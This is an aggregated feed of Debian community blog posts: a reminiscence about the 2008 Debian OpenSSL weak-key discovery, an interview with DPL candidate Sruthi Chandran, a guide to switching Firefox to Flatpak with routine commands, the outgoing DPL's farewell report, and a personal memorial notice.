Once we were really, really confident that the OpenSSH patch wasn t the cause of the problem, my involvement in the problem basically ended. I wasn t a GitHub employee, and EY had plenty of other customers who needed my help, so I wasn t able to stay deeply involved in the on-going investigation of The Mystery of the Duplicate Keys. However, the GitHub team did keep talking to the users involved, and managed to determine the only apparent common factor was that all the users claimed to be using Debian or Ubuntu systems, which was where their SSH keys would have been generated. That was as far as the investigation had really gotten, when along came May 13, 2008.

Chekov s Gun Goes Off With the publication of DSA-1571-1, everything suddenly became clear. Through a well-meaning but ultimately disasterous cleanup of OpenSSL s randomness generation code, the Debian maintainer had inadvertently reduced the number of possible keys that could be generated by a given user from bazillions to a little over 32,000. With so many people signing up to GitHub some of them no doubt following best practice and freshly generating a separate key it s unsurprising that some collisions occurred. You can imagine the sense of oooooooh, so that s what s going on! that rippled out once the issue was understood. I was mostly glad that we had conclusive evidence that my OpenSSH patch wasn t at fault, little knowing how much more contact I was to have with Debian weak keys in the future, running a huge store of known-compromised keys and using them to find misbehaving Certificate Authorities, amongst other things.

Lessons Learned While I ve not found a description of exactly when and how Luciano Bello discovered the vulnerability that became CVE-2008-0166, I presume he first came across it some time before it was disclosed likely before GitHub tripped over it. The stable Debian release that included the vulnerable code had been released a year earlier, so there was plenty of time for Luciano to have discovered key collisions and go hmm, I wonder what s going on here? , then keep digging until the solution presented itself. The thought hmm, that s odd , followed by intense investigation, leading to the discovery of a major flaw is also what ultimately brought down the recent XZ backdoor. The critical part of that sequence is the ability to do that intense investigation, though. When I reflect on my brush with the Debian weak keys vulnerability, what sticks out to me is the fact that I didn t do the deep investigation. I wonder if Luciano hadn t found it, how long it might have been before it was found. The GitHub team would have continued investigating, presumably, and perhaps they (or I) would have eventually dug deep enough to find it. But we were all super busy myself, working support tickets at EY, and GitHub feverishly building features and fighting the fires in their rapidly-growing service. As it was, Luciano was able to take the time to dig in and find out what was happening, but just like the XZ backdoor, I feel like we, as an industry, got a bit lucky that someone with the skills, time, and energy was on hand at the right time to make a huge difference. It s a luxury to be able to take the time to really dig into a problem, and it s a luxury that most of us rarely have. Perhaps an understated takeaway is that somehow we all need to wrestle back some time to follow our hunches and really dig into the things that make us go hmm .

Support My Hunches If you d like to help me be able to do intense investigations of mysterious software phenomena, you can shout me a refreshing beverage on ko-fi.
  1. the odds are actually probably more like winning the lottery about twenty times in a row. The numbers involved are staggeringly huge, so it s easiest to just approximate it as really, really unlikely .

5 April 2024

Bits from Debian: apt install dpl-candidate: Sruthi Chandran

The Debian Project Developers will shortly vote for a new Debian Project Leader known as the DPL. The DPL is the official representative of representative of The Debian Project tasked with managing the overall project, its vision, direction, and finances. The DPL is also responsible for the selection of Delegates, defining areas of responsibility within the project, the coordination of Developers, and making decisions required for the project. Our outgoing and present DPL Jonathan Carter served 4 terms, from 2020 through 2024. Jonathan shared his last Bits from the DPL post to Debian recently and his hopes for the future of Debian. Recently, we sat with the two present candidates for the DPL position asking questions to find out who they really are in a series of interviews about their platforms, visions for Debian, lives, and even their favorite text editors. The interviews were conducted by disaster2life (Yashraj Moghe) and made available from video and audio transcriptions: Voting for the position starts on April 6, 2024. Editors' note: This is our official return to Debian interviews, readers should stay tuned for more upcoming interviews with Developers and other important figures in Debian as part of our "Meet your Debian Developer" series. We used the following tools and services: Turboscribe.ai for the transcription from the audio and video files, IRC: Oftc.net for communication, Jitsi meet for interviews, and Open Broadcaster Software (OBS) for editing and video. While we encountered many technical difficulties in the return to this process, we are still able and proud to present the transcripts of the interviews edited only in a few areas for readability. 2024 Debian Project Leader Candidate: Sruthi Chandran Sruthi's interview Hi Sruthi, so for the first question, who are you and could you tell us a little bit about yourself? [Sruthi]:
I usually talk about me whenever I am talking about answering the question who am I, I usually say like I am a librarian turned free software enthusiast and a Debian Developer. So I had no technical background and I learned, I was introduced to free software through my husband and then I learned Debian packaging, and eventually I became a Debian Developer. So I always give my example to people who say I am not technically inclined, I don't have technical background so I can't contribute to free software. So yeah, that's what I refer to myself.
For the next question, could you tell me what do you do in Debian, and could you mention your story up until here today? [Sruthi]:
Okay, so let me start from my initial days in Debian. I started contributing to Debian, my first contribution was a Tibetan font. We went to a Tibetan place and they were saying they didn't have a font in Linux. So that's how I started contributing. Then I moved on to Ruby packages, then I have some JavaScript and Go packages, all dependencies of GitLab. So I was involved with maintaining GitLab for some time, now I'm not very active there. But yeah, so GitLab was the main package I was contributing to since I contributed since 2016 to maybe like 2020 or something. Later I have come [over to] packaging. Now I am part of some of the teams, delegated teams, like community team and outreach team, as well as the Debconf committee. And the biggest, I think, my activity in Debian, I would say is organizing Debconf 2023. So it was a great experience and yeah, so that's my story in Debian.
So what are three key terms about you and your candidacy? [Sruthi]:
Okay, let me first think about it. For candidacy, I can start with diversity is one point I started expressing from the first time I contested for DPL. But to be honest, that's the main point I want to bring.
[Yashraj]:
So for diversity, if you could break down your thoughts on diversity and make them, [about] your three points including diversity.
[Sruthi]:
So in addition to, eventually when starting it was just diversity. Now I have like a bit more ideas, like community, like I want to be a leader for the Debian community. More than, I don't know, maybe people may not agree, but I would say I want to be a leader of Debian community rather than a Debian operating system. I connect to community more and third point I would say.
The term of a DPL lasts for an year. So what do you think during, what would you try to do during that, that you can't do from your position now? [Sruthi]:
Okay. So I, like, I am very happy with the structure of Debian and how things work in Debian. Like you can do almost a lot of things, like almost all things without being a DPL. Whatever change you want to bring about or whatever you want to do, you can do without being a DPL. Anyone, like every DD has the same rights. Only things I feel [the] DPL has hold on are mainly the budget or the funding part, which like, that's where they do the decision making part. And then comes like, and one advantage of DPL driving some idea is that somehow people tend to listen to that with more, like, tend to give more attention to what DPL is saying rather than a normal DD. So I wanted to, like, I have answered some of the questions on how to, how I plan to do the financial budgeting part, how I want to handle, like, and the other thing is using the extra attention that I get as a DPL, I would like to obviously start with the diversity aspect in Debian. And yeah, like, I, what I want to do is not, like, be a leader and say, like, take Debian to one direction where I want to go, but I would rather take suggestions and inputs from the whole community and go about with that. So yes, that's what I would say.
And taking a less serious question now, what is your preferred text editor? [Sruthi]:
Vim.
[Yashraj]:
Vim, wholeheartedly team Vim?
[Sruthi]:
Yes.
[Yashraj]:
Great. Well, this was made in Vim, all the text for this.
[Sruthi]:
So, like, since you mentioned extra data, I'll give my example, like, it's just a fun note, when I started contributing to Debian, as I mentioned, I didn't have any knowledge about free software, like Debian, and I was not used to even using Linux. So, and I didn't have experience with these text editors. So, when I started contributing, I used to do the editing part using gedit. So, that's how I started. Eventually, I moved to Nano, and once I reached Vim, I didn't move on.
Team Vim. Next question. What, what do you think is the importance of the Debian project in the world today? And where would you like to see it in 10 years, like 10 years into the future? [Sruthi]:
Okay. So, Debian, as we all know, is referred to as the universal operating system without, like, it is said for a reason. We have hundreds and hundreds of operating systems, like Linux, distributions based on Debian. So, I believe Debian, like even now, Debian has good influence on the, at least on the Linux or Linux ecosystem. So, what we implement in Debian has, like, is going to affect quite a lot of, like, a very good percentage of people using Linux. So, yes. So, I think Debian is one of the leading Linux distributions. And I think in 10 years, we should be able to reach a position, like, where we are not, like, even now, like, even these many years after having Linux, we face a lot of problems in newer and newer hardware coming up and installing on them is a big problem. Like, firmwares and all those things are getting more and more complicated. Like, it should be getting simpler, but it's getting more and more complicated. So, I, one thing I would imagine, like, I don't know if we will ever reach there, but I would imagine that eventually with the Debian, we should be able to have some, at least a few of the hardware developers or hardware producers have Debian pre-installed and those kind of things. Like, not, like, become, I'm not saying it's all, it's also available right now. What I'm saying is that it becomes prominent enough to be opted as, like, default distro.
What part of Debian has made you And what part of the project has kept you going all through these years? [Sruthi]:
Okay. So, I started to contribute in 2016, and I was part of the team doing GitLab packaging, and we did have a lot of training workshops and those kind of things within India. And I was, like, I had interacted with some of the Indian DDs, but I never got, like, even through chat or mail. I didn't have a lot of interaction with the rest of the world, DDs. And the 2019 Debconf changed my whole perspective about Debian. Before that, I wasn't, like, even, I was interested in free software. I was doing the technical stuff and all. But after DebConf, my whole idea has been, like, my focus changed to the community. Debian community is a very welcoming, very interesting community to be with. And so, I believe that, like, 2019 DebConf was a for me. And that kept, from 2019, my focus has been to how to support, like, how, I moved to the community part of Debian from there. Then in 2020 I became part of the community team, and, like, I started being part of other teams. So, these, I would say, the Debian community is the one, like, aspect of Debian that keeps me whole, keeps me held on to the Debian ecosystem as a whole.
Continuing to speak about Debian, what do you think, what is the first thing that comes to your mind when you think of Debian, like, the word, the community, what's the first thing? [Sruthi]:
I think I may sound like a broken record or something.
[Yashraj]:
No, no.
[Sruthi]:
Again, I would say the Debian community, like, it's the people who makes Debian, that makes Debian special. Like, apart from that, if I say, I would say I'm very, like, one part of Debian that makes me very happy is the, how the governing system of Debian works, the Debian constitution and all those things, like, it's a very unique thing for Debian. And, and it's like, when people say you can't work without a proper, like, establishment or even somebody deciding everything for you, it's difficult. When people say, like, we have been, Debian has been proving it for quite a long time now, that it's possible. So, so that's one thing I believe, like, that's one unique point. And I am very proud about that.
What areas do you think Debian is failing in, how can it (that standing) be improved? [Sruthi]:
So, I think where Debian is failing now is getting new people into Debian. Like, I don't remember, like, exactly the answer. But I remember hearing someone mention, like, the average age of a Debian Developer is, like, above 40 or 45 or something, like, exact age, I don't remember. But it's like, Debian is getting old. Like, the people in Debian are getting old and we are not getting enough of new people into Debian. And that's very important to have people, like, new people coming up. Otherwise, eventually, like, after a few years, nobody, like, we won't have enough people to take the project forward. So, yeah, I believe that is where we need to work on. We are doing some efforts, like, being part of GSOC or outreachy and having maybe other events, like, local events. Like, we used to have a lot of Debian packaging workshops in India. And those kind of, I think, in Brazil and all, they all have, like, local communities are doing. But we are not very successful in retaining the people who maybe come and try out things. But we are not very good at retaining the people, like, retaining people who come. So, we need to work on those things. Right now, I don't have a solid answer for that. But one thing, like, I was thinking about is, like, having a Debian specific outreach project, wherein the focus will be about the Debian, like, starting will be more on, like, usually what happens in GSOC and outreach is that people come, have the, do the contributions, and they go back. Like, they don't have that connection with the Debian, like, Debian community or Debian project. So, what I envision with these, the Debian outreach, the Debian specific outreach is that we have some part of the internship, like, even before starting the internship, we have some sessions and, like, with the people in Debian having, like, getting them introduced to the Debian philosophy and Debian community and Debian, how Debian works. And those things, we focus on that. And then we move on to the technical internship parts. So, I believe this could do some good in having, like, when you have people you can connect to, you tend to stay back in a project mode. When you feel something more than, like, right now, we have so many technical stuff to do, like, the choice for a college student is endless. So, if they want, if they stay back for something, like, maybe for Debian, I would say, we need to have them connected to the Debian project before we go into technical parts. Like, technical parts, like, there are other things as well, where they can go and do the technical part, but, like, they can come here, like, yeah. So, that's what I was saying. Focused outreach projects is one thing. That's just one. That's not enough. We need more of, like, more ideas to have more new people come up. And I'm very happy with, like, the DebConf thing. We tend to get more and more people from the places where we have a DebConf. Brazil is an example. After the Debconf, they have quite a good improvement on Debian contributors. And I think in India also, it did give a good result. Like, we have more people contributing and staying back and those things. So, yeah. So, these were the things I would say, like, we can do to improve.
For the final question, what field in free software do you, what field in free software generally do you think requires the most work to be put into it? What do you think is Debian's part in that field? [Sruthi]:
Okay. Like, right now, what comes to my mind is the free software licenses parts. Like, we have a lot of free software licenses, and there are non-free software licenses. But currently, I feel free software is having a big problem in enforcing these licenses. Like, there are, there may be big corporations or like some people who take up the whole, the code and may not follow the whole, for example, the GPL licenses. Like, we don't know how much of those, how much of the free softwares are used in the bigger things. Yeah, I agree. There are a lot of corporations who are afraid to touch free software. But there would be good amount of free software, free work that converts into property, things violating the free software licenses and those things. And we do not have the kind of like, we have SFLC, SFC, etc. But still, we do not have the ability to go behind and trace and implement the licenses. So, enforce those licenses and bring people who are violating the licenses forward and those kind of things is challenging because one thing is it takes time, like, and most importantly, money is required for the legal stuff. And not always people who like people who make small software, or maybe big, but they may not have the kind of time and money to have these things enforced. So, that's a big challenge free software is facing, especially in our current scenario. I feel we are having those, like, we need to find ways how we can get it sorted. I don't have an answer right now what to do. But this is a challenge I felt like and Debian's part in that. Yeah, as I said, I don't have a solution for that. But the Debian, so DFSG and Debian sticking on to the free software licenses is a good support, I think.
So, that was the final question, Do you have anything else you want to mention for anyone watching this? [Sruthi]:
Not really, like, I am happy, like, I think I was able to answer the questions. And yeah, I would say who is watching. I won't say like, I'm the best DPL candidate, you can't have a better one or something. I stand for a reason. And if you believe in that, or the Debian community and Debian diversity, and those kinds of things, if you believe it, I hope you would be interested, like, you would want to vote for me. That's it. Like, I'm not, I'll make it very clear. I'm not doing a technical leadership part here. So, those, I can't convince people who want technical leadership to vote for me. But I would say people who connect with me, I hope they vote for me.

3 April 2024

Arnaud Rebillout: Firefox: Moving from the Debian package to the Flatpak app (long-term?)

First, thanks to Samuel Henrique for giving notice of recent Firefox CVEs in Debian testing/unstable. At the time I didn't want to upgrade my system (Debian Sid) due to the ongoing t64 transition transition, so I decided I could install the Firefox Flatpak app instead, and why not stick to it long-term? This blog post details all the steps, if ever others want to go the same road. Flatpak Installation Disclaimer: this section is hardly anything more than a copy/paste of the official documentation, and with time it will get outdated, so you'd better follow the official doc. First thing first, let's install Flatpak:
$ sudo apt update
$ sudo apt install flatpak
Then the next step is to add the Flathub remote repository, from where we'll get our Flatpak applications:
$ flatpak remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
And that's all there is to it! Now come the optional steps. For GNOME and KDE users, you might want to install a plugin for the software manager specific to your desktop, so that it can support and manage Flatpak apps:
$ which -s gnome-software  && sudo apt install gnome-software-plugin-flatpak
$ which -s plasma-discover && sudo apt install plasma-discover-backend-flatpak
And here's an additional check you can do, as it's something that did bite me in the past: missing xdg-portal-* packages, that are required for Flatpak applications to communicate with the desktop environment. Just to be sure, you can check the output of apt search '^xdg-desktop-portal' to see what's available, and compare with the output of dpkg -l grep xdg-desktop-portal. As you can see, if you're a GNOME or KDE user, there's a portal backend for you, and it should be installed. For reference, this is what I have on my GNOME desktop at the moment:
$ dpkg -l   grep xdg-desktop-portal   awk ' print $2 '
xdg-desktop-portal
xdg-desktop-portal-gnome
xdg-desktop-portal-gtk
Install the Firefox Flatpak app This is trivial, but still, there's a question I've always asked myself: should I install applications system-wide (aka. flatpak --system, the default) or per-user (aka. flatpak --user)? Turns out, this questions is answered in the Flatpak documentation:
Flatpak commands are run system-wide by default. If you are installing applications for day-to-day usage, it is recommended to stick with this default behavior.
Armed with this new knowledge, let's install the Firefox app:
$ flatpak install flathub org.mozilla.firefox
And that's about it! We can give it a go already:
$ flatpak run org.mozilla.firefox
Data migration At this point, running Firefox via Flatpak gives me an "empty" Firefox. That's not what I want, instead I want my usual Firefox, with a gazillion of tabs already opened, a few extensions, bookmarks and so on. As it turns out, Mozilla provides a brief doc for data migration, and it's as simple as moving Firefox data directory around! To clarify, we'll be copying data: Make sure that all Firefox instances are closed, then proceed:
# BEWARE! Below I'm erasing data!
$ rm -fr ~/.var/app/org.mozilla.firefox/.mozilla/firefox/
$ cp -a ~/.mozilla/firefox/ ~/.var/app/org.mozilla.firefox/.mozilla/
To avoid confusing myself, it's also a good idea to rename the local data directory:
$ mv ~/.mozilla/firefox ~/.mozilla/firefox.old.$(date --iso-8601=date)
At this point, flatpak run org.mozilla.firefox takes me to my "usual" everyday Firefox, with all its tabs opened, pinned, bookmarked, etc. More integration? After following all the steps above, I must say that I'm 99% happy. So far, everything works as before, I didn't hit any issue, and I don't even notice that Firefox is running via Flatpak, it's completely transparent. So where's the 1% of unhappiness? The Run a Command dialog from GNOME, the one that shows up via the keyboard shortcut <Alt+F2>. This is how I start my GUI applications, and I usually run two Firefox instances in parallel (one for work, one for personal), using the firefox -p <profile> command. Given that I ran apt purge firefox before (to avoid confusing myself with two installations of Firefox), now the right (and only) way to start Firefox from a command-line is to type flatpak run org.mozilla.firefox -p <profile>. Typing that every time is way too cumbersome, so I need something quicker. Seems like the most straightforward is to create a wrapper script:
$ cat /usr/local/bin/firefox 
#!/bin/sh
exec flatpak run org.mozilla.firefox "$@"
And now I can just hit <Alt+F2> and type firefox -p <profile> to start Firefox with the profile I want, just as before. Neat! Looking forward: system updates I usually update my system manually every now and then, via the well-known pair of commands:
$ sudo apt update
$ sudo apt full-upgrade
The downside of introducing Flatpak, ie. introducing another package manager, is that I'll need to learn new commands to update the software that comes via this channel. Fortunately, there's really not much to learn. From flatpak-update(1):
flatpak update [OPTION...] [REF...] Updates applications and runtimes. [...] If no REF is given, everything is updated, as well as appstream info for all remotes.
Could it be that simple? Apparently yes, the Flatpak equivalent of the two apt commands above is just:
$ flatpak update
Going forward, my options are:
  1. Teach myself to run flatpak update additionally to apt update, manually, everytime I update my system.
  2. Go crazy: let something automatically update my Flatpak apps, in my back and without my consent.
I'm actually tempted to go for option 2 here, and I wonder if GNOME Software will do that for me, provided that I installed gnome-software-plugin-flatpak, and that I checked Software Updates -> Automatic in the Settings (which I did). However, I didn't find any documentation regarding what this setting really does, so I can't say if it will only download updates, or if it will also install it. I'd be happy if it automatically installs new version of Flatpak apps, but at the same time I'd be very unhappy if it automatically upgrades my Debian system... So we'll see. Enough for today, hope this blog post was useful!

2 April 2024

Bits from Debian: Bits from the DPL

Dear Debianites This morning I decided to just start writing Bits from DPL and send whatever I have by 18:00 local time. Here it is, barely proof read, along with all it's warts and grammar mistakes! It's slightly long and doesn't contain any critical information, so if you're not in the mood, don't feel compelled to read it! Get ready for a new DPL! Soon, the voting period will start to elect our next DPL, and my time as DPL will come to an end. Reading the questions posted to the new candidates on debian-vote, it takes quite a bit of restraint to not answer all of them myself, I think I can see how that aspect contributed to me being reeled in to running for DPL! In total I've done so 5 times (the first time I ran, Sam was elected!). Good luck to both Andreas and Sruthi, our current DPL candidates! I've already started working on preparing handover, and there's multiple request from teams that have came in recently that will have to wait for the new term, so I hope they're both ready to hit the ground running! Things that I wish could have gone better Communication Recently, I saw a t-shirt that read:
Adulthood is saying, 'But after this week things will slow down a bit' over and over until you die.
I can relate! With every task, crisis or deadline that appears, I think that once this is over, I'll have some more breathing space to get back to non-urgent, but important tasks. "Bits from the DPL" was something I really wanted to get right this last term, and clearly failed spectacularly. I have two long Bits from the DPL drafts that I never finished, I tend to have prioritised problems of the day over communication. With all the hindsight I have, I'm not sure which is better to prioritise, I do rate communication and transparency very highly and this is really the top thing that I wish I could've done better over the last four years. On that note, thanks to people who provided me with some kind words when I've mentioned this to them before. They pointed out that there are many other ways to communicate and be in touch with the community, and they mentioned that they thought that I did a good job with that. Since I'm still on communication, I think we can all learn to be more effective at it, since it's really so important for the project. Every time I publicly spoke about us spending more money, we got more donations. People out there really like to see how we invest funds in to Debian, instead of just making it heap up. DSA just spent a nice chunk on money on hardware, but we don't have very good visibility on it. It's one thing having it on a public line item in SPI's reporting, but it would be much more exciting if DSA could provide a write-up on all the cool hardware they're buying and what impact it would have on developers, and post it somewhere prominent like debian-devel-announce, Planet Debian or Bits from Debian (from the publicity team). I don't want to single out DSA there, it's difficult and affects many other teams. The Salsa CI team also spent a lot of resources (time and money wise) to extend testing on AMD GPUs and other AMD hardware. It's fantastic and interesting work, and really more people within the project and in the outside world should know about it! I'm not going to push my agendas to the next DPL, but I hope that they continue to encourage people to write about their work, and hopefully at some point we'll build enough excitement in doing so that it becomes a more normal part of our daily work. Founding Debian as a standalone entity This was my number one goal for the project this last term, which was a carried over item from my previous terms. I'm tempted to write everything out here, including the problem statement and our current predicaments, what kind of ground work needs to happen, likely constitutional changes that need to happen, and the nature of the GR that would be needed to make such a thing happen, but if I start with that, I might not finish this mail. In short, I 100% believe that this is still a very high ranking issue for Debian, and perhaps after my term I'd be in a better position to spend more time on this (hmm, is this an instance of "The grass is always better on the other side", or "Next week will go better until I die?"). Anyway, I'm willing to work with any future DPL on this, and perhaps it can in itself be a delegation tasked to properly explore all the options, and write up a report for the project that can lead to a GR. Overall, I'd rather have us take another few years and do this properly, rather than rush into something that is again difficult to change afterwards. So while I very much wish this could've been achieved in the last term, I can't say that I have any regrets here either. My terms in a nutshell COVID-19 and Debian 11 era My first term in 2020 started just as the COVID-19 pandemic became known to spread globally. It was a tough year for everyone, and Debian wasn't immune against its effects either. Many of our contributors got sick, some have lost loved ones (my father passed away in March 2020 just after I became DPL), some have lost their jobs (or other earners in their household have) and the effects of social distancing took a mental and even physical health toll on many. In Debian, we tend to do really well when we get together in person to solve problems, and when DebConf20 got cancelled in person, we understood that that was necessary, but it was still more bad news in a year we had too much of it already. I can't remember if there was ever any kind of formal choice or discussion about this at any time, but the DebConf video team just kind of organically and spontaneously became the orga team for an online DebConf, and that lead to our first ever completely online DebConf. This was great on so many levels. We got to see each other's faces again, even though it was on screen. We had some teams talk to each other face to face for the first time in years, even though it was just on a Jitsi call. It had a lasting cultural change in Debian, some teams still have video meetings now, where they didn't do that before, and I think it's a good supplement to our other methods of communication. We also had a few online Mini-DebConfs that was fun, but DebConf21 was also online, and by then we all developed an online conference fatigue, and while it was another good online event overall, it did start to feel a bit like a zombieconf and after that, we had some really nice events from the Brazillians, but no big global online community events again. In my opinion online MiniDebConfs can be a great way to develop our community and we should spend some further energy into this, but hey! This isn't a platform so let me back out of talking about the future as I see it... Despite all the adversity that we faced together, the Debian 11 release ended up being quite good. It happened about a month or so later than what we ideally would've liked, but it was a solid release nonetheless. It turns out that for quite a few people, staying inside for a few months to focus on Debian bugs was quite productive, and Debian 11 ended up being a very polished release. During this time period we also had to deal with a previous Debian Developer that was expelled for his poor behaviour in Debian, who continued to harass members of the Debian project and in other free software communities after his expulsion. This ended up being quite a lot of work since we had to take legal action to protect our community, and eventually also get the police involved. I'm not going to give him the satisfaction by spending too much time talking about him, but you can read our official statement regarding Daniel Pocock here: https://www.debian.org/News/2021/20211117 In late 2021 and early 2022 we also discussed our general resolution process, and had two consequent votes to address some issues that have affected past votes: In my first term I addressed our delegations that were a bit behind, by the end of my last term all delegation requests are up to date. There's still some work to do, but I'm feeling good that I get to hand this over to the next DPL in a very decent state. Delegation updates can be very deceiving, sometimes a delegation is completely re-written and it was just 1 or 2 hours of work. Other times, a delegation updated can contain one line that has changed or a change in one team member that was the result of days worth of discussion and hashing out differences. I also received quite a few requests either to host a service, or to pay a third-party directly for hosting. This was quite an admin nightmare, it either meant we had to manually do monthly reimbursements to someone, or have our TOs create accounts/agreements at the multiple providers that people use. So, after talking to a few people about this, we founded the DebianNet team (we could've admittedly chosen a better name, but that can happen later on) for providing hosting at two different hosting providers that we have agreement with so that people who host things under debian.net have an easy way to host it, and then at the same time Debian also has more control if a site maintainer goes MIA. More info: https://wiki.debian.org/Teams/DebianNet You might notice some Openstack mentioned there, we had some intention to set up a Debian cloud for hosting these things, that could also be used for other additional Debiany things like archive rebuilds, but these have so far fallen through. We still consider it a good idea and hopefully it will work out some other time (if you're a large company who can sponsor few racks and servers, please get in touch!) DebConf22 and Debian 12 era DebConf22 was the first time we returned to an in-person DebConf. It was a bit smaller than our usual DebConf - understandably so, considering that there were still COVID risks and people who were at high risk or who had family with high risk factors did the sensible thing and stayed home. After watching many MiniDebConfs online, I also attended my first ever MiniDebConf in Hamburg. It still feels odd typing that, it feels like I should've been at one before, but my location makes attending them difficult (on a side-note, a few of us are working on bootstrapping a South African Debian community and hopefully we can pull off MiniDebConf in South Africa later this year). While I was at the MiniDebConf, I gave a talk where I covered the evolution of firmware, from the simple e-proms that you'd find in old printers to the complicated firmware in modern GPUs that basically contain complete operating systems- complete with drivers for the device their running on. I also showed my shiny new laptop, and explained that it's impossible to install that laptop without non-free firmware (you'd get a black display on d-i or Debian live). Also that you couldn't even use an accessibility mode with audio since even that depends on non-free firmware these days. Steve, from the image building team, has said for a while that we need to do a GR to vote for this, and after more discussion at DebConf, I kept nudging him to propose the GR, and we ended up voting in favour of it. I do believe that someone out there should be campaigning for more free firmware (unfortunately in Debian we just don't have the resources for this), but, I'm glad that we have the firmware included. In the end, the choice comes down to whether we still want Debian to be installable on mainstream bare-metal hardware. At this point, I'd like to give a special thanks to the ftpmasters, image building team and the installer team who worked really hard to get the changes done that were needed in order to make this happen for Debian 12, and for being really proactive for remaining niggles that was solved by the time Debian 12.1 was released. The included firmware contributed to Debian 12 being a huge success, but it wasn't the only factor. I had a list of personal peeves, and as the hard freeze hit, I lost hope that these would be fixed and made peace with the fact that Debian 12 would release with those bugs. I'm glad that lots of people proved me wrong and also proved that it's never to late to fix bugs, everything on my list got eliminated by the time final freeze hit, which was great! We usually aim to have a release ready about 2 years after the previous release, sometimes there are complications during a freeze and it can take a bit longer. But due to the excellent co-ordination of the release team and heavy lifting from many DDs, the Debian 12 release happened 21 months and 3 weeks after the Debian 11 release. I hope the work from the release team continues to pay off so that we can achieve their goals of having shorter and less painful freezes in the future! Even though many things were going well, the ongoing usr-merge effort highlighted some social problems within our processes. I started typing out the whole history of usrmerge here, but it's going to be too long for the purpose of this mail. Important questions that did come out of this is, should core Debian packages be team maintained? And also about how far the CTTE should really be able to override a maintainer. We had lots of discussion about this at DebConf22, but didn't make much concrete progress. I think that at some point we'll probably have a GR about package maintenance. Also, thank you to Guillem who very patiently explained a few things to me (after probably having have to done so many times to others before already) and to Helmut who have done the same during the MiniDebConf in Hamburg. I think all the technical and social issues here are fixable, it will just take some time and patience and I have lots of confidence in everyone involved. UsrMerge wiki page: https://wiki.debian.org/UsrMerge DebConf 23 and Debian 13 era DebConf23 took place in Kochi, India. At the end of my Bits from the DPL talk there, someone asked me what the most difficult thing I had to do was during my terms as DPL. I answered that nothing particular stood out, and even the most difficult tasks ended up being rewarding to work on. Little did I know that my most difficult period of being DPL was just about to follow. During the day trip, one of our contributors, Abraham Raji, passed away in a tragic accident. There's really not anything anyone could've done to predict or stop it, but it was devastating to many of us, especially the people closest to him. Quite a number of DebConf attendees went to his funeral, wearing the DebConf t-shirts he designed as a tribute. It still haunts me when I saw his mother scream "He was my everything! He was my everything!", this was by a large margin the hardest day I've ever had in Debian, and I really wasn't ok for even a few weeks after that and I think the hurt will be with many of us for some time to come. So, a plea again to everyone, please take care of yourself! There's probably more people that love you than you realise. A special thanks to the DebConf23 team, who did a really good job despite all the uphills they faced (and there were many!). As DPL, I think that planning for a DebConf is near to impossible, all you can do is show up and just jump into things. I planned to work with Enrico to finish up something that will hopefully save future DPLs some time, and that is a web-based DD certificate creator instead of having the DPL do so manually using LaTeX. It already mostly works, you can see the work so far by visiting https://nm.debian.org/person/ACCOUNTNAME/certificate/ and replacing ACCOUNTNAME with your Debian account name, and if you're a DD, you should see your certificate. It still needs a few minor changes and a DPL signature, but at this point I think that will be finished up when the new DPL start. Thanks to Enrico for working on this! Since my first term, I've been trying to find ways to improve all our accounting/finance issues. Tracking what we spend on things, and getting an annual overview is hard, especially over 3 trusted organisations. The reimbursement process can also be really tedious, especially when you have to provide files in a certain order and combine them into a PDF. So, at DebConf22 we had a meeting along with the treasurer team and Stefano Rivera who said that it might be possible for him to work on a new system as part of his Freexian work. It worked out, and Freexian funded the development of the system since then, and after DebConf23 we handled the reimbursements for the conference via the new reimbursements site: https://reimbursements.debian.net/ It's still early days, but over time it should be linked to all our TOs and we'll use the same category codes across the board. So, overall, our reimbursement process becomes a lot simpler, and also we'll be able to get information like how much money we've spent on any category in any period. It will also help us to track how much money we have available or how much we spend on recurring costs. Right now that needs manual polling from our TOs. So I'm really glad that this is a big long-standing problem in the project that is being fixed. For Debian 13, we're waving goodbye to the KFreeBSD and mipsel ports. But we're also gaining riscv64 and loongarch64 as release architectures! I have 3 different RISC-V based machines on my desk here that I haven't had much time to work with yet, you can expect some blog posts about them soon after my DPL term ends! As Debian is a unix-like system, we're affected by the Year 2038 problem, where systems that uses 32 bit time in seconds since 1970 run out of available time and will wrap back to 1970 or have other undefined behaviour. A detailed wiki page explains how this works in Debian, and currently we're going through a rather large transition to make this possible. I believe this is the right time for Debian to be addressing this, we're still a bit more than a year away for the Debian 13 release, and this provides enough time to test the implementation before 2038 rolls along. Of course, big complicated transitions with dependency loops that causes chaos for everyone would still be too easy, so this past weekend (which is a holiday period in most of the west due to Easter weekend) has been filled with dealing with an upstream bug in xz-utils, where a backdoor was placed in this key piece of software. An Ars Technica covers it quite well, so I won't go into all the details here. I mention it because I want to give yet another special thanks to everyone involved in dealing with this on the Debian side. Everyone involved, from the ftpmasters to security team and others involved were super calm and professional and made quick, high quality decisions. This also lead to the archive being frozen on Saturday, this is the first time I've seen this happen since I've been a DD, but I'm sure next week will go better! Looking forward It's really been an honour for me to serve as DPL. It might well be my biggest achievement in my life. Previous DPLs range from prominent software engineers to game developers, or people who have done things like complete Iron Man, run other huge open source projects and are part of big consortiums. Ian Jackson even authored dpkg and is now working on the very interesting tag2upload service! I'm a relative nobody, just someone who grew up as a poor kid in South Africa, who just really cares about Debian a lot. And, above all, I'm really thankful that I didn't do anything major to screw up Debian for good. Not unlike learning how to use Debian, and also becoming a Debian Developer, I've learned a lot from this and it's been a really valuable growth experience for me. I know I can't possible give all the thanks to everyone who deserves it, so here's a big big thanks to everyone who have worked so hard and who have put in many, many hours to making Debian better, I consider you all heroes! -Jonathan

28 March 2024

Scarlett Gately Moore: Kubuntu, KDE Report. In Loving Memory of my Son.

Personal: As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. Mason was Billy s world and I would like to make sure Mason is taken care of. I have set up a gofundme for Mason and all proceeds will go to the future care of him. https://gofund.me/25dbff0c

